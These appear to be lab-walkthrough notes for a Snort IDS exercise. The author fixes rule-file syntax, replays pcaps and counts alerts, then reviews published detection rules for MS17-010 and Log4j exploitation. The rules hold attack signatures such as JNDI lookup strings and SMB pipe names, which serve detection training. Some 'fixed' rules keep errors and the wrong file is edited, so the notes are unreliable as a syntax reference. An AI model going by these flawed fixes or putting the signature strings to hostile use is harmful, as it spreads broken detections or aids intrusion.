  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-1.rules
 alert tcp any 3372 -> any any (msg:"Troubleshooting 1"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-1.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:1000001:1] Troubleshooting 1 [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 16
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the syntax error in local-2.rules file and make it work smoothly. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-2.rules
 alert icmp any -> any any (msg: "Troubleshooting 2"; sid:1000001; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert icmp any any -> any any (msg:"Troubleshooting 2"; sid:1000001; rev:1;)

#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-2.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:1000001:1] Troubleshooting 2 [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 68
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the syntax error in local-3.rules file and make it work smoothly. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-3.rules
 alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found"; sid:1000001; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
     - SIDs must be unique values
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found"; sid:1000002; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-3.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:1000001:1] ICMP Packet Found [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 87
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the syntax error in local-4.rules file and make it work smoothly. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-4.rules
 alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert tcp any 80,443 -> any any (msg: "HTTPX Packet Found": sid:1000001; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
     - SIDs must be unique values
     - semi-colon is used to separate components NOT colons
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert icmp any any -> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert tcp any 80,443 -> any any (msg: "HTTPX Packet Found"; sid:1000002; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-4.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:1000001:1] ICMP Packet Found [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 87
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the syntax error in local-5.rules file and make it work smoothly. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-5.rules
 alert icmp any any <> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert icmp any any <- any any (msg: "Inbound ICMP Packet Found"; sid;1000002; rev:1;)
 alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found": sid:1000003; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
     - SIDs must be unique values
     - semi-colon is used to separate components NOT colons
     - direction only goes toward the right {>} or left & right {<>}
        - there is no left direction by itself!
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert icmp any any <> any any (msg: "ICMP Packet Found"; sid:1000001; rev:1;)
 alert icmp any any -> any any (msg: "Inbound ICMP Packet Found"; sid;1000002; rev:1;)
 alert tcp any any -> any 80,443 (msg: "HTTPX Packet Found": sid:1000003; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-5.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:1000001:1] ICMP Packet Found [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 155
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the logical error in local-6.rules file and make it work smoothly to create alerts. What is the number of the detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-6.rules
 alert tcp any any <> any 80  (msg: "GET Request Found"; content:"|67 65 74|"; sid: 100001; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
     - SIDs must be unique values
     - semi-colon is used to separate components NOT colons
     - direction only goes toward the right {>} or left & right {<>}
        - there is no left direction by itself!
     - nocase keyword MUST be used IOT capture broad payloads
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert tcp any any <> any 80 (msg: "GET Request Found"; content:"|67 65 74|"; nocase; sid: 100001; rev:1;)
  - the |67 65 74| is the hexadecimal representation of "get"
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-6.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:100001:1] GET Request Found [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 155
root@thm:~$ rm -rf alert snort.log.1736108145

Fix the logical error in local-7.rules file and make it work smoothly to create alerts. What is the name of the required option:

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ cat local-7.rules
 alert tcp any any <> any 80 (content:"|2E 68 74 6D 6C|"; sid: 100001; rev:1;)
  - snort's rule parser has a strict syntax. rule components must be complete and 
    properly separated by spaces.
     - SIDs must be unique values
     - semi-colon is used to separate components NOT colons
     - direction only goes toward the right {>} or left & right {<>}
        - there is no left direction by itself!
     - nocase keyword MUST be used IOT capture broad payloads
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-2.rules
 alert tcp any any <> any 80 (msg:"HTML pages found";content:"|2E 68 74 6D 6C|"; nocase; sid: 100001; rev:1;)
  - the |2E 68 74 6D 6C| is the hexadecimal representation of ".html"
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-6 (Troubleshooting)"
root@dco:~$ ls 
 local-1.rules  local-3.rules  local-5.rules  local-7.rules
 local-2.rules  local-4.rules  local-6.rules  mx-1.pcap
root@dco:~$ sudo snort -c local-7.rules -r mx-1.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert snort.log.1736108145 ...
root@thm:~$ cat alert
 ...
 [**] [1:100001:1] HTML pages found [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 9
root@thm:~$ rm -rf alert snort.log.1736108145

USING EXTERNAL RULES (MS17-010)

Use the given rule file (local.rules) to investigate the ms1710 exploitation. What is the number of detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-7 (MS17-010)"
root@dco:~$ ls
 local-1.rules  local.rules  ms-17-010.pcap
root@dco:~$ cat local-1.rules
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow: to_server, established; pcre:"/|57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 50|/"; pcre: "/|72 65 6d 69 75 6d 20 37 36 30 31 20 53 65 72 76|/"; pcre:"/|69 63 65 20 50 61 63 6b 20 31|/"; sid: 2094284; rev: 2;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow: to_server, established; content: "IPC$"; sid:2094285; rev: 3;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow: to_server, established; content: "NTLMSSP";sid: 2094286; rev: 2;) 
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "WindowsPowerShell";sid: 20244223; rev: 3;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "ADMIN$";sid:20244224; rev: 2;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow: to_server, established; content: "IPC$";sid: 20244225; rev:3;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "lsarpc";sid: 20244226; rev: 2;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "lsarpc";sid: 209462812; rev: 3;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "samr"; sid: 209462813; rev: 3;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "browser"; sid: 209462814; rev: 2;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established;content: "epmapper";sid: 209462815; rev: 2;)
 alert tcp any any -> any any (msg: "Exploit Detected!"; flow: to_server, established; content: "eventlog"; sid: 209462816; rev: 2;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow:to_server, established; content: "/root/smbshare"; sid: 20242290; rev: 2;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow:to_server, established; content: "\\PIPE"; sid: 20242291; rev: 3;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow:to_server, established; content: "smbshare"; sid: 20242292; rev: 3;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow:to_server, established; content: "srvsvc"; sid: 20242293; rev: 2;)
 alert tcp any any -> any 445 (msg:"OS-WINDOWS Microsoft Windows SMB remote code execution attempt"; flow:to_server,established; content:"|FF|SMB3|00 00 00 00|"; depth:9; offset:4; byte_extract:2,26,TotalDataCount,relative,little; byte_test:2,>,TotalDataCount,20,relative,little; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy max-detect-ips drop, policy security-ips drop, ruleset community, service netbios-ssn; reference:cve,2017-0144; reference:cve,2017-0146; reference:url,blog.talosintelligence.com/2017/05/wannacry.html; reference:url,isc.sans.edu/forums/diary/ETERNALBLUE+Possible+Window+SMB+Buffer+Overflow+0Day/22304/; reference:url,technet.microsoft.com/en-us/security/bulletin/MS17-010; sid:41978; rev:5;)
 alert tcp any any -> any 445 (msg:"OS-WINDOWS Microsoft Windows SMB remote code execution attempt"; flow:to_server,established; content:"|FF|SMB|A0 00 00 00 00|"; depth:9; offset:4; content:"|01 00 00 00 00|"; within:5; distance:59; byte_test:4,>,0x8150,-33,relative,little; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy max-detect-ips drop, policy security-ips drop, ruleset community, service netbios-ssn; reference:cve,2017-0144; reference:cve,2017-0146; reference:url,isc.sans.edu/forums/diary/ETERNALBLUE+Possible+Window+SMB+Buffer+Overflow+0Day/22304/; reference:url,technet.microsoft.com/en-us/security/bulletin/MS17-010; sid:42944; rev:2;)
 alert tcp any any -> any 445 (msg: "Exploit Detected!"; flow: to_server, established; pcre:"/|57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 50|/"; pcre: "/|72 65 6d 69 75 6d 20 37 36 30 31 20 53 65 72 76|/"; pcre:"/|69 63 65 20 50 61 63 6b 20 31|/"; reference: ExploitDatabase (ID’s - 42030, 42031, 42315); priority: 10; sid: 2094284; rev: 2;)
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local.rules
 * review the external rules
 
#test the external rules against the pcap
root@dco:~$ sudo snort -c local.rules -r ms-17-010.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  ms-17-010.pcap  snort.log.1736175663

root@thm:~$ cat alert
 ...
 [**] [1:2094284:2] Exploit Detected! [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 25154
root@thm:~$ rm -rf alert snort.log.1736108145

Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword. What is the number of detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-7 (MS17-010)"
root@dco:~$ ls
 local-1.rules  local.rules  ms-17-010.pcap
root@dco:~$ cat local-1.rules
 * no rules entry
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-1.rules
 alert tcp any any <> any any (msg:"IPC\\$ Access Attempt"; flow: to_server; content:"IPC$"; nocase; sid:100001; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-7 (MS17-010)"
root@dco:~$ ls 
 local-1.rules  local.rules  ms-17-010.pcap
root@dco:~$ sudo snort -c local-1.rules -r ms-17-010.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  ms-17-010.pcap  snort.log.1736179383 ...
root@thm:~$ cat alert
 ...
 [**] [1:100001:1] IPC\$ Access Attempt [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 12
root@thm:~$ rm -rf alert snort.log.1736108145

Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword. Investigate the log/alarm files. What is the requested path?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-7 (MS17-010)"
root@dco:~$ ls
 local-1.rules  local.rules  ms-17-010.pcap
root@dco:~$ cat local-1.rules
 * no rules entry
  
#syntax <action> <protocol> <sourceIP> <sourcePort> <direction> <destinationIP> <destinationPort> (options {general rule options | payload rule options | non-payload rule options}; sid:uniqueID; rev:revisionNumber;)
root@dco:~$ nano local-1.rules
 alert tcp any any <> any any (msg:"IPC\\$ Access Attempt"; flow: to_server; content:"IPC$"; nocase; sid:100001; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "Desktop/Exercise-Files/TASK-7 (MS17-010)"
root@dco:~$ ls 
 local-1.rules  local.rules  ms-17-010.pcap
root@dco:~$ sudo snort -c local-1.rules -r ms-17-010.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  ms-17-010.pcap  snort.log.1736179383 ...
root@thm:~$ cat alert
 ...
 [**] [1:100001:1] IPC\$ Access Attempt [**]
root@thm:~$ sudo strings snort.log.1736179383 | grep -E [IPC\$]
 \\192.168.116.138\IPC$
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
 \\192.168.116.138\IPC$
 TH_REPLACE__?????
root@thm:~$ rm -rf alert snort.log.1736108145

What is the CVSS v2 score of the MS17-010 vulnerability?

root@thm:~$ BROWSER > google.com
 Search: MS17-010 cvss v2 score
  - NIST: NVD   Base Score: 9.3 HIGH   Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)

USING EXTERNAL RULES (LOG4J)

Use the given rule file (local.rules) to investigate the log4j exploitation. What is the number of detected packets?

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;) 

   # Better and stricter rules, also detects evasion techniques
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Hi"; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Ui"; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Pi"; flowbits:set, fox.apachelog4j.rce.strict; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls 
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ sudo snort -c local.rules -r log4j.pcap -A full -l .

#perform log analysis on the alert file
root@thm:~$ ls
 alert  local-1.rules  local.rules  log4j.pcap  snort.log.1736290032
root@thm:~$ cat alert
 ...
 [**] [1:21003726:1] FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228) [**]
root@thm:~$ grep -E [\[\*\*\]] alert | wc -l
 26
root@thm:~$ rm -rf alert snort.log.1736108145

Use the given rule file (local.rules) to investigate the log4j exploitation. Investigate the log/alarm files. How many rules were triggered?.

root@dco:~$ cd "/Desktop/Exercise-Files/TASK-8 (Log4j)"
root@dco:~$ ls
 local-1.rules  local.rules  log4j.pcap
root@dco:~$ cat local-1.rules
 * alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600;  priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose;  priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;) 

   # Better and stricter rules, also detects evasion techniques
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Hi"; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Ui"; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;) 
   alert tcp any any -> any any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:"/(\$\{\w+:.*\}|jndi)/Pi"; flowbits:set, fox.apachelog4j.rce.strict; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)
 
#test user-created rule by reading pcaps - this will generate snort log files
